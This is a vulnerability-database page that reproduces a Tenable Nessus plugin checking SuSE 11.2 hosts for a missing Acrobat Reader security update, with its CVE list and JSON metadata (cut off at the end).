Search...

SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)

2013-05-19T00:00:00

ID SUSE_11_ACROREAD-130516.NASL
Type nessus
Reporter Tenable
Modified 2014-06-27T00:00:00

Description

Acrobat Reader has been updated to version 9.5.5.

The Adobe Advisory can be found at: https://www.adobe.com/support/security/bulletins/apsb13-15.html

These updates resolve :

memory corruption vulnerabilities that could lead to code execution. (CVE-2013-2718 / CVE-2013-2719 / CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 / CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 / CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 / CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 / CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 / CVE-2013-3341)

an integer underflow vulnerability that could lead to code execution. (CVE-2013-2549)

a use-after-free vulnerability that could lead to a bypass of Adobe Reader's sandbox protection. (CVE-2013-2550)

an information leakage issue involving a JavaScript API. (CVE-2013-2737)

a stack overflow vulnerability that could lead to code execution. (CVE-2013-2724)

buffer overflow vulnerabilities that could lead to code execution. (CVE-2013-2730 / CVE-2013-2733)

integer overflow vulnerabilities that could lead to code execution. (CVE-2013-2727 / CVE-2013-2729)

a flaw in the way Reader handles domains that have been blacklisted in the operating system. (CVE-2013-3342)

                                        
                                            #
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from SuSE 11 update information. The text itself is
# copyright (C) Novell, Inc.
#

if (NASL_LEVEL &lt; 3000) exit(0);

include("compat.inc");

if (description)
{
  script_id(66505);
  script_version("$Revision: 1.9 $");
  script_cvs_date("$Date: 2014/06/27 10:42:17 $");

  script_cve_id("CVE-2013-2549", "CVE-2013-2550", "CVE-2013-2718", "CVE-2013-2719", "CVE-2013-2720", "CVE-2013-2721", "CVE-2013-2722", "CVE-2013-2723", "CVE-2013-2724", "CVE-2013-2725", "CVE-2013-2726", "CVE-2013-2727", "CVE-2013-2729", "CVE-2013-2730", "CVE-2013-2731", "CVE-2013-2732", "CVE-2013-2733", "CVE-2013-2734", "CVE-2013-2735", "CVE-2013-2736", "CVE-2013-2737", "CVE-2013-3337", "CVE-2013-3338", "CVE-2013-3339", "CVE-2013-3340", "CVE-2013-3341", "CVE-2013-3342");

  script_name(english:"SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote SuSE 11 host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Acrobat Reader has been updated to version 9.5.5.

The Adobe Advisory can be found at:
https://www.adobe.com/support/security/bulletins/apsb13-15.html

These updates resolve :

  - memory corruption vulnerabilities that could lead to
    code execution. (CVE-2013-2718 / CVE-2013-2719 /
    CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /
    CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /
    CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /
    CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /
    CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /
    CVE-2013-3341)

  - an integer underflow vulnerability that could lead to
    code execution. (CVE-2013-2549)

  - a use-after-free vulnerability that could lead to a
    bypass of Adobe Reader's sandbox protection.
    (CVE-2013-2550)

  - an information leakage issue involving a JavaScript API.
    (CVE-2013-2737)

  - a stack overflow vulnerability that could lead to code
    execution. (CVE-2013-2724)

  - buffer overflow vulnerabilities that could lead to code
    execution. (CVE-2013-2730 / CVE-2013-2733)

  - integer overflow vulnerabilities that could lead to code
    execution. (CVE-2013-2727 / CVE-2013-2729)

  - a flaw in the way Reader handles domains that have been
    blacklisted in the operating system. (CVE-2013-3342)"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=819918"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2549.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2550.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2718.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2719.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2720.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2721.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2722.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2723.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2724.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2725.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2726.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2727.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2729.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2730.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2731.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2732.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2733.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2734.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2735.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2736.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-2737.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-3337.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-3338.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-3339.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-3340.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-3341.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2013-3342.html"
  );
  script_set_attribute(attribute:"solution", value:"Apply SAT patch number 7734.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:acroread");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:acroread-cmaps");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");

  script_set_attribute(attribute:"patch_publication_date", value:"2013/05/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/05/19");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)11") audit(AUDIT_OS_NOT, "SuSE 11");
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" &gt;!&lt; cpu && "s390x" &gt;!&lt; cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SuSE 11", cpu);

pl = get_kb_item("Host/SuSE/patchlevel");
if (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, "SuSE 11.2");


flag = 0;
if (rpm_check(release:"SLED11", sp:2, cpu:"i586", reference:"acroread-9.5.5-0.3.1")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"i586", reference:"acroread-cmaps-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"i586", reference:"acroread-fonts-ja-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"i586", reference:"acroread-fonts-ko-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"i586", reference:"acroread-fonts-zh_CN-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"i586", reference:"acroread-fonts-zh_TW-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"x86_64", reference:"")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"x86_64", reference:"acroread-cmaps-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"x86_64", reference:"acroread-fonts-ja-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"x86_64", reference:"acroread-fonts-ko-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"x86_64", reference:"acroread-fonts-zh_CN-9.4.6-0.4.3.2")) flag++;
if (rpm_check(release:"SLED11", sp:2, cpu:"x86_64", reference:"acroread-fonts-zh_TW-9.4.6-0.4.3.2")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "SUSE_11_ACROREAD-130516.NASL", "bulletinFamily": "scanner", "title": "SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)", "description": "Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to code execution. (CVE-2013-2718 / CVE-2013-2719 / CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 / CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 / CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 / CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 / CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 / CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been blacklisted in the operating system. (CVE-2013-3342)", "published": "2013-05-19T00:00:00", "modified": "2014-06-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=66505", "reporter": "Tenable", "references": ["http://support.novell.com/security/cve/CVE-2013-2726.html", "http://support.novell.com/security/cve/CVE-2013-2731.html", "http://support.novell.com/security/cve/CVE-2013-2722.html", "http://support.novell.com/security/cve/CVE-2013-2732.html", "http://support.novell.com/security/cve/CVE-2013-2736.html", "http://support.novell.com/security/cve/CVE-2013-2718.html", "http://support.novell.com/security/cve/CVE-2013-2719.html", "http://support.novell.com/security/cve/CVE-2013-2723.html", "http://support.novell.com/security/cve/CVE-2013-2550.html", "http://support.novell.com/security/cve/CVE-2013-3337.html", "http://support.novell.com/security/cve/CVE-2013-2734.html", "http://support.novell.com/security/cve/CVE-2013-2729.html", "http://support.novell.com/security/cve/CVE-2013-3338.html", "http://support.novell.com/security/cve/CVE-2013-2724.html", "http://support.novell.com/security/cve/CVE-2013-2737.html", "http://support.novell.com/security/cve/CVE-2013-2727.html", "http://support.novell.com/security/cve/CVE-2013-3340.html", "http://support.novell.com/security/cve/CVE-2013-3339.html", "https://bugzilla.novell.com/show_bug.cgi?id=819918", "http://support.novell.com/security/cve/CVE-2013-2730.html", "http://support.novell.com/security/cve/CVE-2013-2720.html", "http://support.novell.com/security/cve/CVE-2013-3341.html", "http://support.novell.com/security/cve/CVE-2013-3342.html", "http://support.novell.com/security/cve/CVE-2013-2549.html", "http://support.novell.com/security/cve/CVE-2013-2735.html", "http://support.novell.com/security/cve/CVE-2013-2733.html", "http://support.novell.com/security/cve/CVE-2013-2721.html", "http://support.novell.com/security/cve/CVE-2013-2725.html"], "cvelist": ["CVE-2013-2718", "CVE-2013-2733", "CVE-2013-2724", "CVE-2013-2731", "CVE-2013-2725", "CVE-2013-2721", "CVE-2013-2723", "CVE-2013-2722", "CVE-2013-2720", "CVE-2013-2550", "CVE-2013-3339", "CVE-2013-2737", "CVE-2013-2734", "CVE-2013-2719", "CVE-2013-2735", "CVE-2013-2736", "CVE-2013-3341", "CVE-2013-2726", "CVE-2013-2729", "CVE-2013-2727", "CVE-2013-3337", "CVE-2013-3342", "CVE-2013-2732", "CVE-2013-2730", "CVE-2013-2549", "CVE-2013-3338", "CVE-2013-3340"], "type": "nessus", "lastseen": "2019-02-21T01:18:56", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "cvelist": ["CVE-2013-2718", "CVE-2013-2733", "CVE-2013-2724", "CVE-2013-2731", "CVE-2013-2725", "CVE-2013-2721", "CVE-2013-2723", "CVE-2013-2722", "CVE-2013-2720", "CVE-2013-2550", "CVE-2013-3339", "CVE-2013-2737", "CVE-2013-2734", "CVE-2013-2719", "CVE-2013-2735", "CVE-2013-2736", "CVE-2013-3341", "CVE-2013-2726", "CVE-2013-2729", "CVE-2013-2727", "CVE-2013-3337", "CVE-2013-3342", "CVE-2013-2732", "CVE-2013-2730", "CVE-2013-2549", "CVE-2013-3338", "CVE-2013-3340"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to code execution. (CVE-2013-2718 / CVE-2013-2719 / CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 / CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 / CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 / CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 / CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 / CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been blacklisted in the operating system. (CVE-2013-3342)", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "27f648398389c15a47b1df434de6e82701da9ab9c3209abb9cd2a94c1e585d63", "hashmap": [{"hash": "b7d964d31ceb19828376c6b29f67ab4f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3915c269beae984e656e15c5cff71b31", "key": "description"}, {"hash": "9b1fd3436c4d001d02a057ece18c32db", "key": "title"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "dd906d3e06e3de29c2a35454a1d6e8a1", "key": "cvelist"}, {"hash": "6b01ab9924b51f2f50795114abfd2971", "key": "references"}, {"hash": "144314e655908bceed52c4a5fb4a5710", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20176f54edbcd7032dfea78d1cf309a1", "key": "modified"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c2716a5d83da1721f23778e107a0d6a0", "key": "cpe"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "9a62ae0ed697cbadc7e7a18563be61a7", "key": "published"}, {"hash": "ab6cddd653e5a262cf9792179aafae7f", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66505", "id": "SUSE_11_ACROREAD-130516.NASL", "lastseen": "2017-10-29T13:34:11", "modified": "2014-06-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "66505", "published": "2013-05-19T00:00:00", "references": ["http://support.novell.com/security/cve/CVE-2013-2726.html", "http://support.novell.com/security/cve/CVE-2013-2731.html", "http://support.novell.com/security/cve/CVE-2013-2722.html", "http://support.novell.com/security/cve/CVE-2013-2732.html", "http://support.novell.com/security/cve/CVE-2013-2736.html", "http://support.novell.com/security/cve/CVE-2013-2718.html", "http://support.novell.com/security/cve/CVE-2013-2719.html", "http://support.novell.com/security/cve/CVE-2013-2723.html", "http://support.novell.com/security/cve/CVE-2013-2550.html", "http://support.novell.com/security/cve/CVE-2013-3337.html", "http://support.novell.com/security/cve/CVE-2013-2734.html", "http://support.novell.com/security/cve/CVE-2013-2729.html", "http://support.novell.com/security/cve/CVE-2013-3338.html", "http://support.novell.com/security/cve/CVE-2013-2724.html", "http://support.novell.com/security/cve/CVE-2013-2737.html", "http://support.novell.com/security/cve/CVE-2013-2727.html", "http://support.novell.com/security/cve/CVE-2013-3340.html", "http://support.novell.com/security/cve/CVE-2013-3339.html", "https://bugzilla.novell.com/show_bug.cgi?id=819918", "http://support.novell.com/security/cve/CVE-2013-2730.html", "http://support.novell.com/security/cve/CVE-2013-2720.html", "http://support.novell.com/security/cve/CVE-2013-3341.html", "http://support.novell.com/security/cve/CVE-2013-3342.html", "http://support.novell.com/security/cve/CVE-2013-2549.html", "http://support.novell.com/security/cve/CVE-2013-2735.html", "http://support.novell.com/security/cve/CVE-2013-2733.html", "http://support.novell.com/security/cve/CVE-2013-2721.html", "http://support.novell.com/security/cve/CVE-2013-2725.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66505);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2014/06/27 10:42:17 $\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n\n script_name(english:\"SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2550.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2719.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2720.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2721.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2722.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2723.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2724.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2725.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2726.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2727.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2729.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2731.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2732.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2733.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2734.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2735.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2737.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3342.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, 